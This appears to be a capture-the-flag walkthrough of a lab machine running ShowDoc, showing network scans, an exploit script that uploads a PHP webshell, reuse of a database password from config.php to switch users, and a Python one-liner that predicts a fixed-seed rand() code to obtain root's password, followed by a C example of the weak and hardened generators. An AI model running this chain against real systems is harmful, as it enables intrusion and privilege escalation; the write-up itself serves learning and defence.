Information gathering

```
┌──(root㉿kali)-[~]
└─# arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:04:d2:0f, IPv4: 192.168.0.105
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     90:76:9f:0d:9f:8c       SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD.
192.168.0.100   f0:20:ff:13:f9:a2       (Unknown)
192.168.0.101   08:00:27:53:6b:8a       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.962 seconds (130.48 hosts/sec). 3 responded
```

Port scan

```
┌──(root㉿kali)-[~]
└─# nmap -sC -sV 192.168.0.101 -n -vv -min-rate=2000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-28 15:59 CST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Initiating ARP Ping Scan at 15:59
Scanning 192.168.0.101 [1 port]
Completed ARP Ping Scan at 15:59, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:59
Scanning 192.168.0.101 [65535 ports]
Discovered open port 22/tcp on 192.168.0.101
Discovered open port 80/tcp on 192.168.0.101
Completed SYN Stealth Scan at 15:59, 8.10s elapsed (65535 total ports)
Initiating Service scan at 15:59
Scanning 2 services on 192.168.0.101
Completed Service scan at 15:59, 6.16s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.0.101.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Nmap scan report for 192.168.0.101
Host is up, received arp-response (0.0024s latency).
Scanned at 2026-04-28 15:59:31 CST for 15s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 10.0p2 Debian 7deb13u1 (protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.66 ((Debian))
| http-title: ShowDoc
|_Requested resource was ./web/#/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 1FBC02DC6F980F075779049BF687128A
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.66 (Debian)
MAC Address: 08:00:27:53:6B:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
```

Visiting port 80 shows that the web application is ShowDoc. Running nuclei against it flags an arbitrary file upload in ShowDoc (CNVD-2020-26585):

```
┌──(root㉿kali)-[~]
└─# nuclei -u http://192.168.0.101

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.7.0

                projectdiscovery.io

[INF] Current nuclei version: v3.7.0 (outdated)
[INF] Current nuclei-templates version: v10.4.2 (latest)
[INF] New templates added in latest release: 121
[INF] Templates loaded for current scan: 10095
[INF] Executing 10079 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 16 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 2281 (Reduced 2154 Requests)
[CNVD-2020-26585] [http] [critical] http://192.168.0.101/Public//Uploads//2026-04-28//69f06b45a1834.txt
[INF] Using Interactsh Server: oast.site
[INF] Skipped 192.168.0.101:80 from target list as found unresponsive permanently: cause=no address found for host chain=got err while executing https://login.microsoftonline.com:443/192.168.0.101/v2.0/.well-known/openid-configuration
[cookies-without-secure] [javascript] [info] 192.168.0.101 [PHPSESSID]
[cookies-without-httponly] [javascript] [info] 192.168.0.101 [PHPSESSID]
[INF] Skipped 192.168.0.101:9780 from target list as found unresponsive permanently: cause=port closed or filtered address=192.168.0.101:9780 chain=connection refused; got err while executing http://192.168.0.101:9780/api/v1/user_assets/nfc
[ssh-auth-methods] [javascript] [info] 192.168.0.101:22 [[publickey,password]]
[ssh-password-auth] [javascript] [info] 192.168.0.101:22
[ssh-sha1-hmac-algo] [javascript] [info] 192.168.0.101:22
[ssh-server-enumeration] [javascript] [info] 192.168.0.101:22 [SSH-2.0-OpenSSH_10.0p2 Debian-7deb13u1]
[INF] Skipped 192.168.0.101:5814 from target list as found unresponsive permanently: Get https://192.168.0.101:5814/autopass: cause=port closed or filtered address=192.168.0.101:5814 chain=connection refused
[dockerfile-hidden-disclosure] [http] [medium] http://192.168.0.101/Dockerfile
[robots-txt] [http] [info] http://192.168.0.101/robots.txt
[missing-cookie-samesite-strict] [http] [info] http://192.168.0.101 [PHPSESSID=7ndpunsj75b667kusqntfuu9ig; path=/]
[tech-detect:php] [http] [info] http://192.168.0.101
[readme-md] [http] [info] http://192.168.0.101/README.md
[http-missing-security-headers:strict-transport-security] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:permissions-policy] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:x-frame-options] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:x-content-type-options] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:clear-site-data] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:missing-content-type] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:content-security-policy] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:referrer-policy] [http] [info] http://192.168.0.101/web/#/
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://192.168.0.101/web/#/
[INF] Skipped 192.168.0.101:4040 from target list as found unresponsive permanently: cause=port closed or filtered address=192.168.0.101:4040 chain=connection refused; got err while executing https://192.168.0.101:4040/jobs/?\<script>alert(document.domain)</script>
[robots-txt-endpoint] [http] [info] http://192.168.0.101/robots.txt
[showdoc-panel] [http] [info] http://192.168.0.101/web/#/user/login
[INF] Scan completed in 1m. 26 matches found.
```

```
┌──(root㉿kali)-[/tmp/showdoc_fileupload]
└─# python3 showdoc_fileupload_exp.py -u http://192.168.0.101/

(ASCII-art banner omitted)
fileupload_exp by m2

[+] http://192.168.0.101 file upload success!
webshell_path: http://192.168.0.101/Public/Uploads/2026-04-28/69f06eb92fef8.php
冰蝎3连接,默认password:m2orz
任务完成用时0s
```

Then connect with Behinder (冰蝎) directly.

Privilege escalation

Searching around turned up the configuration file config.php, which contains the password showdoc123456. Trying it to log in as the mooi and l1qin9 users succeeded for both.

```
www-data@Show:~/html/server/Application/Common/Conf$ ls -al
total 20
drwxr-xr-x 2 www-data www-data 4096 Jul 20  2020 .
drwxr-xr-x 4 www-data www-data 4096 Jul 20  2020 ..
-rw-r--r-- 1 www-data www-data 1903 Jul 20  2020 config.php
-rw-r--r-- 1 www-data www-data  800 Jul 20  2020 debug.php
-rw-r--r-- 1 www-data www-data    1 Jul 20  2020 index.html
www-data@Show:~/html/server/Application/Common/Conf$ cat config.php
<?php
return array(
    //'config item' => 'config value'
    //use the sqlite database
    'DB_TYPE'   => 'Sqlite',
    'DB_NAME'   => '../Sqlite/showdoc.db.php',
    //showdoc no longer supports mysql http://www.showdoc.cc/help?page_id=31990
    'DB_HOST'   => 'localhost',
    'DB_USER'   => 'showdoc',
    'DB_PWD'    => 'showdoc123456',
    'DB_PORT'   => '3306',      // port
    'DB_PREFIX' => '',          // database table prefix
    'DB_CHARSET'=> 'utf8',      // charset
    'DB_DEBUG'  => TRUE,        // database debug mode; when enabled, SQL logs are recorded
    'URL_HTML_SUFFIX' => '',    //url pseudo-static suffix
    'URL_MODEL' => 3,           //URL compatibility mode
    'URL_ROUTER_ON' => true,
    'URL_ROUTE_RULES' => array(
        ':id\d'        => 'Home/Item/show?item_id=:1',
        ':domain\s$'   => 'Home/Item/show?item_domain=:1', //item's custom domain
        'uid/:id\d'    => 'Home/Item/showByUid?uid=:1',
        'page/:id\d'   => 'Home/Page/single?page_id=:1',
    ),
    'URL_CASE_INSENSITIVE' => true,
    'SHOW_ERROR_MSG' => true,   // show error messages, so errors are displayed in deployment mode too
    'STATS_CODE' => '',         //optional analytics code
    'TMPL_CACHE_ON' => false,   //disable template compile cache
    'HTML_CACHE_ON' => false,   //disable static cache
    'TMPL_EXCEPTION_FILE' => '../Public/exception.tpl', //error template
    //configuration for uploading files to Qiniu
    'UPLOAD_SITEIMG_QINIU' => array(
        'maxSize'  => 5 * 1024 * 1024, //file size
        'rootPath' => './',
        'saveName' => array('uniqid', ''),
        'driver'   => 'Qiniu',
        'driverConfig' => array(
            'secrectKey' => '',
            'accessKey'  => '',
            'domain'     => '',
            'bucket'     => '',
        )
    ),
);
www-data@Show:~/html/server/Application/Common/Conf$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
mooi:x:1000:1000:,,,:/home/mooi:/bin/bash
l1qin9:x:1001:1001:,,,:/home/l1qin9:/bin/bash
www-data@Show:~/html/server/Application/Common/Conf$ su mooi
Password:
mooi@Show:/var/www/html/server/Application/Common/Conf$ id
uid=1000(mooi) gid=1000(mooi) groups=1000(mooi),100(users)
mooi@Show:/var/www/html/server/Application/Common/Conf$ su l1qin9
Password:
l1qin9@Show:/var/www/html/server/Application/Common/Conf$ id
uid=1001(l1qin9) gid=1001(l1qin9) groups=1001(l1qin9),100(users)
l1qin9@Show:/var/www/html/server/Application/Common/Conf$
```

Finally, in the l1qin9 user's home directory there is an auth_monitor binary with the SUID bit set. Analysing it showed that it calls the real srand() with the fixed seed 0x539, so the expected access code is just the first rand() output for that seed. Generating the correct code with the payload below yields root's password.

Payload:

```
python3 -c 'import ctypes; libc=ctypes.CDLL("libc.so.6"); libc.srand(0x539); print(libc.rand())'
```

```
l1qin9@Show:~$ python3 -c 'import ctypes; libc=ctypes.CDLL("libc.so.6"); libc.srand(0x539); print(libc.rand())'
292616681
l1qin9@Show:~$ ls -al
total 60
drwx------ 2 l1qin9 l1qin9  4096 Apr 27 12:27 .
drwxr-xr-x 4 root   root    4096 Apr 25 20:07 ..
-rwsr-sr-x 1 root   root   16632 Apr 25 22:43 auth_monitor
lrwxrwxrwx 1 root   root       9 Apr 25 22:47 .bash_history -> /dev/null
-rw-r--r-- 1 l1qin9 l1qin9   220 Apr 25 20:07 .bash_logout
-rw-r--r-- 1 l1qin9 l1qin9  3526 Apr 25 20:07 .bashrc
-rwxrwxr-x 1 l1qin9 l1qin9 16096 Apr 27 12:27 calc
-rw-rw-r-- 1 l1qin9 l1qin9   410 Apr 27 12:26 calc.c
-rw-r--r-- 1 l1qin9 l1qin9   807 Apr 25 20:07 .profile
l1qin9@Show:~$ ./auth_monitor
--- MAZE-SEC ACCESS MONITOR ---
SYSTEM_TICK: 1777367879
CHALLENGE_STAMP: b1427726
ENTER ACCESS CODE: 292616681
1NOjcN9b9uqUJ0VPYbgi
l1qin9@Show:~$ su root
Password:
root@Show:/home/l1qin9# id
uid=0(root) gid=0(root) groups=0(root)
root@Show:/home/l1qin9#
```

Done, that's it.
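The auth_monitor flaw comes down to seeding rand() with a constant, which turns the "access code" into a fixed value rather than a secret. The following added C example (not code from the box or from the write-up) puts the fixed-seed generator next to a version that draws the code from the kernel CSPRNG; the function names and the /dev/urandom fallback are this example's own choices.

```c
#include <stdio.h>
#include <stdlib.h>

/* The constant seed the write-up found hard-coded in auth_monitor. */
#define FIXED_SEED 0x539

/* Weak: the code is a pure function of the constant seed, so any caller
 * with the same libc reproduces it (292616681 on the glibc of that box). */
unsigned int weak_access_code(void) {
    srand(FIXED_SEED);
    return (unsigned int)rand();
}

/* Hardened: take the code from the kernel CSPRNG instead of rand().
 * Returns 0 on success, -1 if /dev/urandom cannot be read.
 * getrandom(2) would be the direct call on Linux; /dev/urandom is used
 * here so the example also builds on other Unix-likes. */
int strong_access_code(unsigned int *out) {
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f) return -1;
    size_t n = fread(out, sizeof *out, 1, f);
    fclose(f);
    return n == 1 ? 0 : -1;
}

/* Audit helper: a generator whose two independent runs agree has no
 * entropy. Returns 1 for the fixed-seed generator (always). */
int weak_code_repeats(void) {
    return weak_access_code() == weak_access_code();
}

int main(void) {
    unsigned int a = 0, b = 0;
    printf("fixed-seed code: %u, again: %u (repeats: %d)\n",
           weak_access_code(), weak_access_code(), weak_code_repeats());
    if (strong_access_code(&a) == 0 && strong_access_code(&b) == 0)
        printf("urandom codes:   %u, %u\n", a, b);
    return 0;
}
```

The same test applied to a challenge that really depends on SYSTEM_TICK or a per-run nonce would return 0; a constant result is the signal that a SUID binary's check can be bypassed offline.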